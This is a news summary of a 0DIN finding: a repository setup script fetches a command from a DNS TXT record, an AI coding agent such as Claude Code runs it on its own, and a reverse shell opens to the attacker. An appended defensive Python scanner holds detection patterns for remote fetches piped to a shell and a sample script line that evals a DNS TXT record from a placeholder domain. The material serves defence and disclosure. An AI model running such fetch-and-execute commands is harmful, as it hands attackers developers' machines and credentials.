Security researchers at 0DIN, Mozilla's GenAI bug bounty platform, discovered a new attack vector that exploits AI coding tools. Attackers can gain full control of a developer's machine by embedding malicious code in a GitHub repository. The malware is hidden and not directly visible in the repository, making it difficult to detect through standard scanning methods or code reviews.

The attack works by using a setup script in the repo that pulls a command from a DNS entry at runtime and executes it. Because the malicious code is never present in the repository itself, it evades scanners and AI agents that only inspect committed files. When a user runs an AI coding tool like Claude Code on the repository, the tool encounters a routine-looking error during setup, runs the script automatically, and opens a reverse shell to the attacker. This gives the attacker access to sensitive information such as API keys and login credentials, enabling persistent access to the target system.

The researchers emphasized that the attack can be triggered by a single repository link in a job posting, tutorial, or Slack message. They recommended that AI agents display the contents of setup scripts before executing them, and that developers treat setup instructions from third-party repos as untrusted code.
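One practical form of the "show the setup script before running it" recommendation is a pre-execution check that flags lines which resolve code at run time (a DNS TXT record, a remote download, or a decoded blob) and hand it to a shell. The following is an added example, not code from 0DIN or from the article; the regexes and the sample setup script are constructed for illustration and use a reserved `.invalid` domain.

```python
import re

# Sources that produce code at run time rather than shipping it in the repo.
# Patterns are constructed for this example and should be tuned locally.
DNS_LOOKUP = re.compile(r"\b(dig|nslookup|host|drill)\b.*\bTXT\b", re.I)
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b")
DECODE = re.compile(r"\bbase64\b.*\s(-d|--decode)\b")
# Sinks that turn a string into executed code.
SHELL_SINK = re.compile(
    r"(\|\s*(ba|z|da)?sh\b|\b(ba|z|da)?sh\s+-c\b|\beval\b|\bsource\b|\bexec\b)"
)

def classify_line(line):
    """Return a reason string if the line executes content it fetched, else None."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    if not SHELL_SINK.search(s):
        return None  # nothing on this line executes a string
    if DNS_LOOKUP.search(s):
        return "DNS TXT record fed to a shell"
    if REMOTE_FETCH.search(s):
        return "remote download fed to a shell"
    if DECODE.search(s):
        return "decoded blob fed to a shell"
    return None

def scan_setup_script(text):
    """Return [(line_no, reason, line)] for every line a human should review first."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        reason = classify_line(line)
        if reason:
            findings.append((n, reason, line.strip()))
    return findings

# Constructed sample: an ordinary-looking setup script whose real command is
# resolved from a DNS TXT record at run time (line 5).
SAMPLE_SETUP_SH = """\
#!/bin/sh
set -e
npm install
cp .env.example .env
eval "$(dig +short TXT config.example.invalid)"
echo "setup complete"
"""

if __name__ == "__main__":
    for n, reason, line in scan_setup_script(SAMPLE_SETUP_SH):
        print(f"line {n}: {reason}: {line}")
```

A hit is a prompt to read the line and the record it points at, not proof of malice; the point is that the agent or developer sees it before anything runs.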

Source: thedecoder